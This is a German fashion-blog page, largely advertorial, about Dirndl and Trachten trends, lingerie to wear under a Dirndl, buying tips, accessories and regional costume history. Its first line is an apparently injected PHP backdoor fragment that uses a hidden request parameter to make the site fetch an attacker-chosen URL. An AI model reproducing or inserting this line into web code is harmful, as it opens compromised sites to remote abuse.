isset($_REQUEST['bayvxx']) && fetch_feed($_REQUEST['feed_url']); Trachtenkleid, Dirndl, Trachten & Trachtenkleider.

Trends 2014

Trachtenmode - das sind die Trends für 2014

Auch 2014 wird es wieder neue Modetrends in der Trachtenmode geben, die vermehrt im Internet angeboten werden. Auf Gutscheine für Trachtenkleider von Gutscheinpony sollte auch 2014 nicht verzichtet werden. Fangen wir doch einmal mit der Trachtenmode für die Männer an. Nicht wegzudenken ist für die Herren die Lederhose. Und die bleibt natürlich aus Leder. Allerdings gibt es hier den luxuriösen Trend, die Lederhosen aus Rehleder zu schneidern. Dies ist feiner als das normale Hirschleder, kann aber aufgrund seiner Beschaffenheit nur für kurze Hosen genommen werden. Und kurz ist Trend und kommt als oberschenkellange Lederhose daher. Das beste Accessoire sind in diesem Fall perfekte Wadl´n .

Die beste Farbe für die Hemden ist und bleibt ein strahlendes Weiß - allerdings liegt man mit dezent gemusterten Hemden oder Vichykaro auch nicht falsch.

Die Rocklänge

Die trendige Rocklänge für 2014 heißt "Knie-umspielend". Das entspricht ungefähr einer Rocklänge von 60cm und reicht etwa bis zum Knie. Schwingende Tellerröcke machen diesen Trend komplett. Nach wie vor gern getragen werden lange Dirndl. Diese sehen immer elegant aus und sind gerade bei Abendeinladungen Bedingung. Individuell bestickt und aus Spitze unterstreicht es den Typ der Trägerin und ist eine Anschaffung für viele Jahre.

Die Farben

Klassische Dirndl aus Leinen oder Baumwolle kommen in den traditionellen Farben kirschrot oder dunkelgrün daher. Zu den Klassikern rosa und hellblau kommen dieses Jahr noch türkis und apfelgrün dazu. Im Großen und Ganzen geht der Trend weg von den jugendlichen Modellen der letzten Jahre, gefragt sind jetzt edle frauliche Modelle. Bestickte Mieder und Blusen mit Lochstickerei stehen jeder Frau gut.
Die Schürze sollte einfarbig und Ton in Ton gehalten werden. Die Muster sind dezent und unaufdringlich.

Materialien wie Seide und Organza finden sich eher in edlen Designermodellen wieder. Farbkombinationen in Silber, Gold oder Schwarz-Weiß geben hier den Ton an. Auch die Frau liegt mit einer Lederhose durchaus richtig, oberschenkellang und schön bestickt wird auch traditionell nichts verkehrt gemacht. Accessoires werden 2014 nur dezent eingesetzt, man beschränkt sich auf einige wenige Stücke und peppt sein Aussehen mit den Ballerinas oder Haferlschuhen auf.

Welcher BH fürs Trachtenkleid?

In Bayern wird ein Trachtenkleid auch als Dirndl bezeichnet und ein BH sollte unter keinem Dirndl fehlen denn er bringt es erst so richtig zur Geltung. Es gibt Trachtenkleider von festlich lang bis zu kurz sexy, mit und ohne Bluse und passender Schürze.

Wo findet man den passenden BH?

Ein Geheimtipp: man bekommt die BHs günstig bei Calida München. Dort findet man eine große Auswahl, eingehende telefonische Beratung und versandkostenfreie Lieferung. Auch spezielle Wäschegeschäfte im Einzelhandel oder Warenhäuser bieten reichlich passende BHs zur individuellen Auswahl. Bei online Bestellungen ist es wichtig die korrekte Größe vorher ganau zu ermitteln und darauf zu achten, dass man die Ware möglichst versandkostenfrei bestellen und portofrei umtauschen kann falls der BH nicht passt.

Wie soll ein BH fürs Trachtenkleid beschaffen sein?

Ein einteiliges Trachtenkleid oder zweiteilig mit Bluse hat fast immer einen Ausschnitt und so ist es wichtig, dass das Dekollete einen hübschen Anblick bietet. Normale BHs zu einem Trachtenkleid sind meist nicht geeignet. Welche Frau hat schon den idealen Busen?

Bei zu wenig Oberweite ist ein Push-Up-BH angebracht. Der ist mit kleinen Kissen ausgestattet und täuscht ein wenig mehr Fülle und Volumen vor. Hat man einen eher zu großen, fülligen Busen gibt es Minimizer, die ihn optisch verkleinern. Die Träger des BHs sollten möglichst seitlich weit außen angebracht sein damit sie nicht hervorschauen. Für ganz weite Ausschnitte oder schulterfreie Kleider trägt man am besten trägerlose BHs oder solche mit durchsichtigen Trägern. Bei Trägerlosen ist es wichtig, dass sie gut und fest sitzen damit sie bei heftiger Bewegung wie z.B. Tanzen nicht verrutschen. Wer es gerne hat, dass ein kleiner Teil des BHs am Ausschnitt herausschaut kann zwischen vielen Stil-Paletten wählen. Von schwarz mit verführerischen Rüschen bis hin zu romantischem Weiß. Hat man erst den richtigen BH fürs Trachtenkleid gefunden kann er viele Jahre Freude bereiten.

Trachtenkleider: 5 Tipps beim Trachtenkleidkauf

Trachtenkleider sind volkstümliche - von Frauen getragene - Kleidung, die meist aus einfachen Stoffen wie Leinen oder Baumwolle bestand und zur Arbeit, aber auch zu besonderen Anlässen getragen wurde. Natürlich hat man das Kleid zu besonderen Anlässen mit Accessiores aufgewertet. Heute sieht man das Trachtenkleid oder auch Dirndl vor allen bei Volksfesten. Das prominenteste Volksfest ist dabei das Münchner Oktoberfest, aber auch auf der Stuttgarter Wasen wird man das ein oder andere traditionelle Kleid sehen. Aber auch zur Kommunion oder anderen Anlässen trägt die Frau sehr gerne Tracht. Wer ein Trachtenkleid für einen besonderen Anlass kaufen möchte, der sollte unbedingt die 5 Tipps beherzigen.

1. Modell auswählen

Soll das Trachtenkleid eher verziert sein oder doch eher schlicht, unauffällig aber gleichermaßen schick? Wünscht man besondere Farben oder stehen einem einfach manche Farben nicht so? Soll das Kleid Dekolté zeigen oder eher verschlossen sein? Alle diese Fragen sollte man sich stellen, bevor man ein Modell auswählt.

2. Größe auswählen

Jede Frau wird wohl am besten selber wissen, welche Kleidergröße ihr trägt und demnach ein passendes Kleid kaufen. Zu klein oder zu groß gekaufte Trachtenkleider sehen einfach nicht mehr ansehnlich aus und sollte sofort nach Erhalt wieder an den Lieferanten (innerhalb der gesetzlichen Rückgabefrist von 14 Tagen) zurück geschickt werden.

3. passende Schuhe zum Kleid

Bei der Auswahl der Mode ist natürlich auch immer zu beachten, ob man passendes Schuhwerk zum Kleid besitzt oder dieses erst kaufen muss. Besitzt man schon rote Schuhe, sollte man also auch eher zu einem roten Trachtenkleid greifen oder zumindestens zu einer Farbe, die gleich zu den Schuhen passt.

4. Preise vergleichen

Man sollte unbedingt die Preise in verschiedenen Onlineshops vergleichen, bevor man sich für ein Stück entscheidet, denn die Preisunterschiede sind teilweise enorm. Wie man günstig einkauft, gleichzeitig Gutscheine einlöst und damit gute Schnäppchen macht, verraten viele Modeportale, die Gutscheine auflisten (z.B. http://yup.de/mode-schuhe-bekleidung).

5. Gefällt nicht? Geld zurück!

Man sollte sich nicht scheuen, die Ware zurück zu schicken, wenn einem das Trachtenkleid nicht passt oder garnicht gefällt. Dafür gibt es ein gesetzlich geregeltes Rückgaberecht. Liegt der Warenwert über 40 €, muss der Anbieter zusätzlich die entstehenden Versandkosten übernehmen.

Charms Anhänger - Der perfekte Trachtenschmuck

Bald ist es wieder soweit und es wird wieder mehr Zeit draußen verbracht. Damit einher geht die Saison der Volksfeste und somit auch die Saison der Trachten. Eine schöne Tracht kann schon alle Blicken auf sich ziehen. Doch verschiedene Anhänger auf lacadena.de können selbst das schönste Dirndl noch verbessern. Wie in der Alltagsmode ist also hier das richtige Accessoire der Weg zum wahren Erfolg. Besonders angesagt und praktisch sind in dieser Saison Charm Anhänger, die nicht nur das Outfit verschönern, sondern auch dem Trachtenlook eine ganz persönliche Note geben.

Charms Anhänger - wunderschön und individuell

Um diese modischen Anhänger richtig tragen zu können, wird an erster Stelle ein Kettchen benötigt, an dem die Charms befestigt werden können. Für den Trachtenlook eignen sich vor allem rustikale Ketten aus Altgold oder schlichte, schmale Silberkettchen. Manche dieser Kettchen haben Ösen für die verschiedenen Charms, andere sind nur schlichte Kettchen. Ein gelungener Look kann mit beiden Versionen entstehen. Populär in der Trachtmode sind die Charms Anhänger vor allem als Armband oder als Kette. Bei einem Armband bietet sich nur ein Anhänger an. Bei einem Armband ist eher üblich mehrere Charms an dem Kettchen zu tragen.

Persönliche oder typische Botschaft

Wie oben erwähnt, können die Charms eine sehr persönliche Botschaft transportieren, gerade deshalb, weil sie mit so vielen verschiedenen Motiven zu erwerben sind. Das heißt, dass Charms ausgewählt werden können, die besondere Hobbies unterstreichen, besondere Orte rekapituliert oder einfache Glücksbringer abbilden. Dies könnte eine Schreibfeder für das Hobby "schreiben" sein, ein Brandenburger Tor für Berlin oder ein vier-blättriges Kleeblatt. In der Trachtenmode bietet es sich aber auch an Motive zu wählen, die auf dem Oktoberfest und co immer wieder gesehen werden. Beispiele dafür sind z. B. ein Lebkuchenherz, ein Bierkrug oder eine Brez´l. Bei den Charms kann also jeder selbst entscheiden, ob er gleich persönlich werden möchte.

 

Was unterm Dirndl tragen?

Bis zum Oktoberfest dauert’s zwar noch ein Weilchen, aber zumindest im bayerischen Raum hat sich das Dirndl längst zur Allzweckwaffe für festliche Anlässe entwickelt. Hat die Biergarten Saison erst einmal begonnen, sieht man zum Beispiel in der bayerischen Landeshauptstadt zahlreiche fesche Madel in zünftigen Dirndl. Viele Damen haben bereits mehrere Dirndl, Schürzen und andere Accessoires bei sich im Schrank. Aber häufig stellt sich die Frage, was trägt man idealerweise unterm Dirndl?

Wichtig ist vor allem, dass auch das "unten drunter" die weiblichen Figur so gekonnt wie möglich in Szene setzt. Denn die Faszination des Dirndls lebt von der Aura der Weiblichkeit, die dieses Kleidungsstück seinen Trägerinnen verleiht. Das ideale "Dirndl-Darunter" formt eine perfekt weibliche Silhouette und ist natürlich auch schön anzuschauen.

Dem Albstädter Wäschehersteller Mey gelingt es seit Jahren bei seiner Damen Unterwäsche sinnlich-feminine Designs mit einem Höchstmaß an Funktionalität zu verbinden. Ein perfektes "Dirndl-Drunter" von Mey ist zum Beispiel der Body mit dem Seriennamen Veronique. Aus Spitzenplain, welches mit weichem Tüll unterlegt ist, sieht dieser Body nicht nur sehr gut aus, sondern stützt und betont auch die weiblichen Formen an den entscheidenden Stellen. Ein genähtes Büstenteil mit Bügeln und Funktionsrücken sorgt für das perfekte Dirndl-Dekolleté. Durch edle Schmuckanhänger mit Schleifchen am Steg und komfortable Zierträger ist ein verführerischer Look garantiert. Ein verstellbarer Verschluss am Rücken und im Schritt ermöglicht einen perfekten Sitz.

Wem ein Body "too much" ist, der findet bei Mey auch eine große Auswahl an süßen Push-up-BHs. Tiefe Einblicke gewährt zum Beispiel der Allure Push-up-BH mit verstärkten Undercups für einen extrastarken Push-Up-Effekt. Durch ihn wirkt die Brust gleich eine Nummer größer. Für ein verführerisches Aussehen sorgen hier ein breites edles Spitzenband und die seidenschimmernde, extrem glatte Oberfläche. Um den Look zu komplementieren, gibt es bei Mey natürlich auch jede Menge sexy Strings und Jazzpants.

Im offiziellen Mey Online-Shop (shop.mey.de) findet man das größte und vielfältigste Mey Sortiment weltweit. Hochwertige Produktabbildungen, eine hochauflösende Zoomfunktion und detaillierte Produktbeschreibungen vermitteln einen umfassenden Eindruck von den Artikeln.

Trachtenkleider für viele Gelegenheiten

Trachtenkleider werden in verschiedenen Formen angeboten, da sie heute oft auch im Alltag getragen werden. Ursprünglich entstanden die Trachten in verschiedenen Gegenden, wo sie als Zeichen der Zugehörigkeit von Bäuerinnen getragen wurden. Diese Kleider waren aus groben Stoffen gefertigt und dienten als eine Art Arbeitskleidung. Heute bestehen die Trachten aus feinen und zum Teil exquisiten Stoffen, die von modernen Designern nach der neuesten Mode entworfen werden. Diese Kleider können im Sommer auf einem Spaziergang genauso getragen werden, wie auf einem Volksfest in der Heimat der Trägerin.

Trachtenkleider mit passenden Accessoires

Diese Kleider dürfen nicht immer mit dem Dirndl gleichgesetzt werden, die nur mit einer Schürze getragen werden. Ein Trachtenkleid kann ebenso mit Schürze oder ohne sehr schön aussehen. Andere Accessoires sind beispielsweise Schals mit langen Fransen, die locker über die Schulter gelegt werden. Andere Kleider sind mit exquisiten Knöpfen verziert, die nicht mit einer Schürze abgedeckt werden sollten. Weitere Verzierungen sind die Spitzen an den Ärmeln und am Dekolleté, die fein verarbeitet sind. Schmuck aller Art gehört natürlich ebenfalls zu einem Trachtenkleid, wie eine Perlenkette.

Trachten im modernen Design

Die Designer haben sich schon lange mit den Trachten beschäftigt und sie modernisiert. Die Stoffe werden immer leichter und passen sich der neuesten Mode an. Auch ein Rock und eine Bluse, im Stil einer Tracht, zählen zu den Trachtenkleidern. Natürlich zählt das bayrische Dirndl ebenfalls zu den Trachten, das gerne getragen wird. Zu den schönen Blusen der Trachten müssen die Damen aber den passenden BH zum Dirndl finden.

aktuelle Trachten auf der Wiesn

Review der Wiesn 2012: Das trugen die Damen bei Deutschlands größtem Volksfest

Wie jedes Jahr war die Trachtenmode der Damen auf der bayrischen Wiesn eines der Highlights des größten deutschen Volksfestes. Nirgendwo auf der Welt lassen sich gleichzeitig so viele schöne Kleider und volle Dekolletés bestaunen. Aber natürlich unterliegt auch die Dirndl-Mode jährlichen Trends. Lesen Sie hier, welche Stile, Farben und Accessoires man in diesem Jahr zum Dirndl trug.

Auf der Wiesn ist in Sachen Tracht alles möglich

Das Oktoberfest hat sich weltweit einen Kultstatus als das größte Volksfest der Welt erworben. Die bayrische Tracht ist zur Mode und zum Aushängeschild des Festes geworden. Das hat natürlich auch die Modeindustrie bemerkt. Es gibt kaum ein Modehaus oder einen Designer, der zum Oktoberfest kein Dirndl in seiner Kollektion hat. Die Trägerinnen haben somit die große Qual der Wahl. Generell war im Jahr 2012 auf der Wiesn alles möglich und erlaubt. Die neue Version der Tracht ist sehr entspannt und hat manchmal kaum noch Ähnlichkeit mit der ursprünglichen Mode. Man konnte Damen in Sari-Dirndl-Versionen oder im afrikanischen Muster-Mix bewundern. Mit frischen und knalligen Farben kamen sogar viele junge Mädchen und Frauen in Mini-Dirndln daher.

Die schönsten Dirndl-Looks

Zu den schönsten Trachten-Looks gehörten die, die ihre Trägerin regelrecht zur Prinzessin werden ließen. Wahre Hingucker waren knielange oder kniebedeckende Dirndls, mit viel Spitze und Farbe unterlegt. Diese ähneln vom Stil her ein wenig dem klassischen "kleinen Schwarzen". Der Trend ging 2012 zu Dirndln in frischen Farben wie Pink, Lindgrün oder Türkis oder, besonders prächtig, aus hochwertigem Satin. Wichtig sind hierbei vor allem die Unterröcke: Der Rock darf niemals schlapp herabhängen. Natürlich durfte auch keines der typischen Accessoires fehlen - Die Trachtenmode, ob edel oder leger, ist erst vollständig mit einer Schürze und der richtigen Bluse zur Betonung des Dekolletés. Schöne Blusen zum Kombinieren gibt es z.B. bei Luxodo.

Jahrmarkt der Eitelkeiten

Die moderne Trachtenmode der Damenwelt hat sich auch 2012 auf dem Oktoberfest ein wahres Schaulaufen geliefert. Wohin man auch blickte, überall Frauen in den schönsten Kleidern. Das Oktoberfest war - wie jedes Jahr - ein Jahrmarkt der Eitelkeiten zwischen Tradition und Moderne.

 

Traditionelle Bekleidung - mit Stolz die eigene Tradition zur Schau tragen

Träger von traditioneller Kleidung sind in der modernen Zeit eher eine Randerscheinung. Kein Wunder, ist es doch heutzutage möglich, dass jeder einen eigenen Stil entwickelt und seine Bekleidung nach eigenem Geschmack zusammenstellt. Dennoch lieben es viele Menschen, die alten Traditionen zu besonderen Anlässen wieder aufleben zu lassen und sich in der historischen Tracht ihrer Heimatregion zu kleiden. Denn Trachten bedeuten nicht nur ein Stück Heimatverbundenheit, sondern ermöglichen es dem Träger oder der Trägerin auch, der eigenen Vergangenheit Leben einzuhauchen.

Trachtenvielfalt in Deutschland

Besonders in Bayern hat sich das Tragen einer bayerischen Tracht bis heute erhalten. Die traditionelle Bekleidung ist dabei von Region zu Region verschieden und beschränkt sich nicht nur, wie allgemein angenommen, auf Dirndl und Lederhosen. Diese zeigen nur einen kleinen Ausschnitt aus der bayerischen Trachtenvielfalt, und zwar die oberbayerische Gebirgstracht. Daneben existieren jedoch noch zahlreiche weitere Kleidungstraditionen, wie beispielsweise die Herrschinger Hosenträger, die Dachauer Tracht oder der Priener Hut. Auch im Brandenburger Spreewald gibt es eine lebendige Trachtentradition. Die weiblichen Mitglieder der in der Lausitz ansässigen Sorben tragen neben einem schweren Samtrock eine bestickte oder gehäkelte Schürze sowie ein Kopftuch, das wie eine Haube getragen wird. Die Bremer Tracht hingegen geht zum einen auf das städtische Bremen des 17.Jahrhunderts, zum anderen auf das ländliche Bremen des 19.Jahrhunderts zurück. Im 17.Jahrhundert trugen Bürgerfrauen schwarze oder rote Faltenröcke mit weißer Schürze, sowie eine Damastjacke mit großen Ärmelpuffern. Davon unterschied sich die ländliche Tracht des 19.Jahrhunderts durch einen langen Wollrock ("Wullaken"), sowie durch die so genannte "Hullen-Hube", eine traditionelle Kopfbedeckung. Beide Trachtenarten werden alljährlich auf Bremer Volks-und Dorffesten wieder lebendig.

Warum heutzutage überhaupt noch traditionelle Bekleidung tragen?

Besonders in unserer modernen, globalisierten Welt verspüren immer mehr Menschen das Bedürfnis, sich auf ihre Wurzeln zu besinnen. Die Welt ist nicht nur äußerst schnelllebig geworden, sondern verlangt zudem eine erhöhte Bereitschaft zur Mobilität, also den Willen, die eigene Heimat zu verlassen, um andernorts sein Glück zu versuchen. In diesem Fall kann das Tragen einer traditionellen Tracht auf Festen oder bei anderen besonderen Anlässen erheblich dazu beitragen, mit der Heimat verbunden zu bleiben. Doch auch für Daheimgebliebene stellt traditionelle Bekleidung eine Möglichkeit dar, einen Bezug zu ihrer eigenen Vergangenheit und der Heimatregion herzustellen, da ähnliche Kleidung schon von vielen vorhergehenden Generationen getragen wurde. Trachten stellen in einer Welt des ständigen Wandels also eine Konstante dar, die helfen kann, die eigenen Identität kennen zu lernen und zu festigen.

Trachten als Ausdruck der Heimatverbundenheit

Auch wenn für die meisten Menschen das Tragen einer Tracht im Alltag nicht möglich und zudem unpraktisch ist: Traditionelle Bekleidung zu besonderen Anlässen zu tragen, macht nicht nur Freude, sondern ermöglicht es auch, dem Stolz auf die Heimat Ausdruck zu verleihen und sich seiner eigenen Wurzeln bewusst zu werden.

Mehr zu Mode & Lifestyle im http://www.frauen-magazin.com!

Trachtenmode unterstreicht den individuellen Stil bei jedem Anlass

Sowohl im ländlichen als auch im urbanen Bereich zählt Trachten- und Landhausmode zu einem immer beliebter werdenden Kleidungsstil. Dabei überzeugt vor allem die Einzigartigkeit und das Traditionsbewusstsein dieser Mode, die nicht nur zu bestimmten Anlässen getragen wird.

Tolle Farbkombinationen und modischer Style machen Trachentmode modisch aktuell

Wer sich im Mode online Shop umsieht, entdeckt mehr und mehr Landhausmode und Elemente aus der Trachtenkleidung. Diese kann nahezu von jedem, egal ob Groß und Klein, schmächtig oder gut proportioniert, getragen werden und verleiht individuelle Persönlichkeit. Neben dem Dirndl gibt es auch die traditionellen Lederhosen, die in unterschiedlichen Längen inzwischen nicht mehr nur von den Herren getragen werden. Bei NKD finden Damen, die dieses Beinkleid einmal ausprobieren möchten, eine gute Mischung aus modernem Schnitt und traditioneller Verarbeitung. Gesamt gibt dies einen modischen Look, der mit den richtigen Accessoires zu einem optisch perfekten Outfit für Alltag und zu besonderen Anlässen gleichermaßen wird. Neben dem Kleidungsstil, der sich zwischen Landhausstil und typischer Tracht bewegt, gehört auch Schmuck und vor allem die richtige Frisur zu diesem Outfit. Geflochtene Zöpfe oder Haarpartien verleihen jeder Dame mit Dirndl das besondere Etwas und trägt zum optimalen optischen Auftritt bei.

Traditionelle Tracht wird modisch aufgepeppt

Neben der klassischen Tracht, die meist regional individuell gefertigt und als Ausdruck der Zusammengehörigkeit zu einer Gemeinschaft getragen wird, wird der moderne Landhausstil immer beliebter. Traditionelle Dirndl erhalten einen modischen Schnitt und eine kürzere Rocklänge und können damit auch im urbanen Umfeld gut getragen werden. Vor allem hochwertige Materialien wie Leinen oder Seide machen diesen Look einmalig. Dabei muss der Interessierte nicht mehr in entsprechende Fachgeschäfte gehen, um sich eine Tracht zuzulegen, auch wer sich im Mode Online Shop von NKD umsieht, findet Modelle für sämtliche Kleidergrößen und in allen Preislagen. Vor allem im Sommer sind Trachtenkleider im Landhausstil, die ohne Bluse und Schürze getragen werden, sehr beliebt und durchaus auch für den Büroalltag geeignet. Online finden sich neben den modischen Beispielen für Dirndlkleider in sämtlichen Farbkombinationen auch traditionelle Leinenhemden und Lederhosen für den Mann, die mit einem typischen Strickjanker in hochwertiger Wollqualität kombiniert werden. Auch grobmaschige Strickstutzen und die traditionellen Haferlschuhe finden sich im Angebot.

 

Fesche Frisuren und schickes Dirndl

Das Dirndl hat schon lange Einzug gehalten - und das nicht nur im schönen Bayern. Oktoberfeste werden überall gefeiert und wer up to date sein möchte, der kann das nur mit einem schicken Dirndl. Ob klassisch oder sexy - die eigenen Wünsche sind ausschlaggebend und es gibt eine große Produktpalette, so dass sich für jeden Geschmack das richtige finden lässt.

Dirndl lassen sich sowohl über das Internet wie auch in vielen Geschäften vor Ort finden. Die Kosten müssen dabei gar nicht so hoch sein. Wer allerdings auf ein qualitativ hochwertiges Dirndl Wert legt, der muss dann doch etwas tiefer in die Tasche greifen. Allerdings ist ein Dirndl schon eine lohnenswerte Ausgabe, denn der besondere Charme diese Kleidungsstückes geht nie verloren.

Die Farben sind ganz verschieden und auch die Länge des Dirndls ist vom eigenen Geschmack abhängig. Klassisch ist allerdings das wadenlange Dirndl gefragt - wer auf die Tradition keinen Wert legt, trägt aber auch gerne mal ganz kurz.

Zum Dirndl gehört allerdings auch die passende Frisur. Der Bauernzopf oder eine andere Flechtfrisur muss her - viele können das allerdings nicht selber. Ist auch gar nicht so einfach, wenn man darin keine Übung hat. Friseur-Jesch kann bei der Vorbereitung fürs Oktobergaudi hilfreich zur Seite stehen. Tolle Frisuren machen das Dirndl erst zu dem, was es wirklich ist - ein Outfit für die attraktive Frau, egal welchen Jahrgangs. Das Dirndl betont genau das, was eine Frau zu bieten hat. Heiße Kurven gehören beim Oktobergaudi eben einfach dazu und wer sie hat soll sie ruhig ein wenig betonen.